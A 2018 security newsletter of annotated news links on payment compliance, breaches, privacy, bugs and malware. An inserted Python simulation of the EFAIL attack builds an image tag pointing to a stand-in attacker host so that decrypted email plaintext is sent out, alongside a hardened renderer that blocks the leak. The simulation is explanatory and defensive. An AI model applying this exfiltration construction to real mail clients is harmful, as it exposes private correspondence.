This Week’s [in]Security – Issue 60
22 May 2018.
Welcome to This Week’s [in]Security. We’ve collected and grouped together a selection of this week’s news, opinions, and research. Quickly skim these annotated links organized by topic: compliance and payment security, breaches, regulation, bugs, privacy, hacking/malware, other security & risk, and more. We hope you enjoy and find them useful.
PCI Compliance and Payments
- PCI DSS 3.2.1 is out. Change summary https://www.pcisecuritystandards.org/documents/PCIDSSSummaryofChanges_3-2-1.pdf , updated standard https://www.pcisecuritystandards.org/documents/PCIDSSv3-2-1.pdf.
- PCI Q&A on PCI DSS 3.2.1. The reporting templates and SAQs will be published in June. Note that while no requirements were added to the DSS, SAQ-A will change to address patching of redirection servers https://blog.pcisecuritystandards.org/pci-dss-now-and-looking-ahead
- PCI has updated the Technical FAQ documents for several standards (Technical FAQs are typically mandatory rather than just informational):
- PIN https://www.pcisecuritystandards.org/documents/PTSPINTechnicalFAQsv2May2018.pdf
- PTS HSM https://www.pcisecuritystandards.org/documents/PTSHSMTechnicalFAQsv3May2018.pdf
- PTS POI (terminals) https://www.pcisecuritystandards.org/documents/PTSPOITechnicalFAQsv5May2018.pdf
- Card Production https://www.pcisecuritystandards.org/documents/CardProdSecurityRqrmtsFAQ__v2May2018.pdf
- Software PIN on COTS https://www.pcisecuritystandards.org/documents/SPoCTechnicalFAQs.pdf
- Researchers test measuring magnetic stripe recording jitter as a way to detect cloned cards at the ATM or register https://krebsonsecurity.com/2018/05/detecting-cloned-cards-at-the-atm-register/
Breaches / Leaks
- Chili's hit by payment card breach using POS malware https://www.zdnet.com/article/chilis-restaurant-chain-suffers-data-breach/
- Rail Europe North America suffers 3 month e-commerce breach including personal and payment card data https://www.darkreading.com/endpoint/rail-europe-notifies-riders-of-three-month-data-breach/d/d-id/1331800
- Equifax reverses its original claim that no passport numbers were exposed in last year's mega-breach https://www.vox.com/business-and-finance/2018/5/10/17337260/equifax-data-breach-passports
- CBC reports that a theft of computer equipment put information on 20K current and former employees and contractors at risk; the report doesn't say whether the equipment was encrypted http://www.cbc.ca/news/politics/cbc-privacy-breach-insurance-1.4665909
- The 407ETR reports data on 60K customers was leaked through internal theft and ended up being used for political recruiting. A former 407 employee has resigned as a provincial election candidate over possible linkage to the incident http://nationalpost.com/news/politics/internal-theft-of-data-on-60000-customers-of-ontarios-private-407-freeway-could-be-linked-to-pc-party-recruitment
- Healthcare continues to be the growth industry for breaches https://www.databreachtoday.com/health-data-breach-tally-latest-additions-a-11013
- Suspected source of Wikileaks Vault 7 dump identified as an ex-CIA employee http://www.theregister.co.uk/2018/05/15/vault7leak/
Laws & Regulations / Standards
- Citizen Lab releases a report on the encryption debate, framed as a Canadian field guide https://citizenlab.ca/2018/05/shining-light-on-encryption-debate-canadian-field-guide/
- Patent revoked: victory in troll podcasting patent https://www.eff.org/deeplinks/2018/05/eff-wins-final-victory-over-podcasting-patent
Privacy
- Facebook update:
- Another Cambridge University researcher, connected to the Cambridge Analytica researcher, collected personality data on 6M users and shared roughly half of it with outside parties https://www.databreachtoday.com/report-facebook-app-exposed-3-million-more-users-data-a-11009
- 200 apps suspended https://www.darkreading.com/threat-intelligence/facebook-suspends-200-apps/d/d-id/1331794
- 583M fake accounts closed in 2018Q1 https://www.theguardian.com/technology/2018/may/15/facebook-closed-583m-fake-accounts-in-first-three-months-of-2018
- EFF's Privacy Badger updated to take on link tracking, a technique used by Facebook and others https://www.eff.org/deeplinks/2018/05/privacy-badger-rolls-out-new-ways-fight-facebook-tracking
- Supreme court rules privacy rights cannot be undermined by fine print https://www.eff.org/deeplinks/2018/05/supreme-court-says-your-expectation-privacy-probably-shouldnt-depend-fine-print
- A company is providing cell phone location data to law enforcement without warrants https://www.schneier.com/blog/archives/2018/05/accessingcell.html
- A bug in a related company's service allowed anyone to locate a cell phone https://www.theregister.co.uk/2018/05/18/phonetrackerfoulup/
Bugs / Design Flaws
- More serious Adobe bugs https://www.theregister.co.uk/2018/05/14/adobecriticalfixes/
- The EFAIL vulnerability affects email clients using PGP and S/MIME: attacker-supplied HTML objects wrapped around the ciphertext cause the client to exfiltrate the decrypted plaintext of encrypted emails https://www.schneier.com/blog/archives/2018/05/detailsona_ne.html
- Signal messaging app was patched to prevent remote code injection https://thehackernews.com/2018/05/signal-messenger-code-injection.html
- A second remotely executable, network-based Rowhammer attack in the last month https://thehackernews.com/2018/05/remote-rowhammer-attack.html
- A second remote code injection bug in Signal within a week https://thehackernews.com/2018/05/signal-desktop-hacking.html
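To make the EFAIL item above concrete, here is an added simulation (not code from the EFAIL researchers or from any mail client) of the direct-exfiltration channel: the attacker puts an <img> tag with an unterminated src attribute before the stolen ciphertext and closes the attribute after it, so a client that decrypts and then renders all parts as one HTML document sends the plaintext to the attacker's server as part of an image URL. The attacker host, the ciphertext marker, the plaintext and the fake_decrypt stand-in are all constructed for the demonstration; the hardened variant shows two of the mitigations that work here (render each MIME part separately, and block remote content loads).

```python
import html
from html.parser import HTMLParser

ATTACKER = "http://attacker.example/"                 # hypothetical attacker-controlled host
CIPHERTEXT = "-----BEGIN PGP MESSAGE-----[captured]"  # stand-in marker for an encrypted MIME part
SECRET = "Wire 10,000 EUR to account 42"              # constructed plaintext of the captured message


def fake_decrypt(part):
    """Stand-in for PGP/S-MIME decryption: returns the constructed plaintext for the marker."""
    return SECRET if part == CIPHERTEXT else part


def craft_efail_message(ciphertext):
    """Attacker's multipart message: <img src=" ... [ciphertext] ... ">.

    The src attribute is opened in the first part and only closed in the third,
    so whatever the ciphertext decrypts to ends up inside the URL.
    """
    return [f'<img src="{ATTACKER}', ciphertext, '">']


class ImgSrcCollector(HTMLParser):
    """Records every <img src=...> URL a renderer would try to fetch."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs += [v for k, v in attrs if k == "src" and v]


def image_requests(document):
    parser = ImgSrcCollector()
    parser.feed(document)
    parser.close()
    return parser.srcs


def vulnerable_render(parts, decrypt=fake_decrypt):
    """Vulnerable behaviour: decrypt each part, concatenate everything into one
    HTML document, and fetch remote images. Returns the URLs that would be requested."""
    document = "".join(decrypt(p) for p in parts)
    return image_requests(document)


def hardened_render(parts, decrypt=fake_decrypt):
    """Hardened behaviour: every MIME part is rendered as its own document,
    decrypted content is shown as escaped text rather than HTML, and remote
    (http/https) loads are refused. Returns the URLs that would still be requested."""
    requests = []
    for p in parts:
        if p == CIPHERTEXT:
            document = "<pre>" + html.escape(decrypt(p)) + "</pre>"
        else:
            document = p
        requests += [u for u in image_requests(document)
                     if not u.startswith(("http://", "https://"))]
    return requests


def leaks(urls, secret=SECRET):
    """True if the plaintext would leave the client inside any request URL."""
    return any(secret in u for u in urls)


if __name__ == "__main__":
    message = craft_efail_message(CIPHERTEXT)
    print("vulnerable client requests:", vulnerable_render(message))
    print("hardened client requests:  ", hardened_render(message))
```

The vulnerable path yields a single request to http://attacker.example/Wire 10,000 EUR to account 42, which is the whole plaintext delivered to the attacker's web server log; the hardened path makes no request at all. Either mitigation alone breaks this particular channel, which is why "disable remote content loading" was the immediate advice for affected clients.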
Hacking / Malware / Cybercrime
- Malware adopts the recently identified "Process Doppelgänging" technique for stealthy installation https://threatpost.com/variant-of-synack-malware-adopts-doppelganging-technique/131760/
- 5 Mexican banks defrauded through electronic transfers https://www.databreachtoday.com/mexico-investigates-suspected-cyberattacks-against-5-banks-a-11008
- Dark Overlord cybercrime group being rounded up https://www.databreachtoday.com/noose-tightens-around-dark-overlord-hacking-group-a-11014
Other Security / Risk
- Researchers sending inaudible commands to voice assistants have raised their game, turning music and voice recordings into Trojan horses https://www.schneier.com/blog/archives/2018/05/sending_inaudib.html
- Why you shouldn’t expose Remote Desktop (RDP) to the Internet https://www.darkreading.com/endpoint/the-risks-of-remote-desktop-access-are-far-from-remote/a/d-id/1331820
- New OWASP 2017 Top Ten play by play mini-course https://www.troyhunt.com/new-pluralsight-course-owasp-top-10-2017
- Windows 10 Spring update includes OpenSSH https://www.zdnet.com/article/openssh-arrives-in-windows-10-spring-update/
- The downside of biometrics: once compromised, a fingerprint or iris can't be reissued like a password https://www.theregister.co.uk/2018/05/17/theeyeshave_it/
- First Wales, now London: a police facial recognition system has a high false positive rate and zero arrests to show for it https://www.theregister.co.uk/2018/05/15/metpoliceslammedinaccuratefacial_recognition/
Off-Topic
- The Gaia mission just unloaded data on 13K white dwarf stars within 300 light years of Earth - including evidence of mergers https://www.universetoday.com/139190/gaia-turns-up-13928-white-dwarfs-nearby-the-sun-including-several-formed-through-mergers/
- NASA's 2020 mission to Mars includes sending a helicopter to fly in the ultra-thin atmosphere! https://www.universetoday.com/139228/nasa-is-sending-a-helicopter-to-mars-as-part-of-the-2020-rover/
- Why jetpacks still aren't a big thing despite getting cooler https://www.theguardian.com/technology/2018/may/15/jetpacks-jet-propulsion-flying-to-work
- Pros and cons of various ways of travelling between stars https://www.universetoday.com/139215/pros-and-cons-of-various-methods-of-interstellar-travel/
- Alan Turing made a discovery in the field of chemistry that is improving desalination technology https://www.economist.com/news/science-and-technology/21741538-how-desalination-got-its-stripes-membrane-can-remove-salts-water-more
- Fast and permanent method of turning CO2 into stone may help fight global warming http://www.bbc.com/news/world-43789527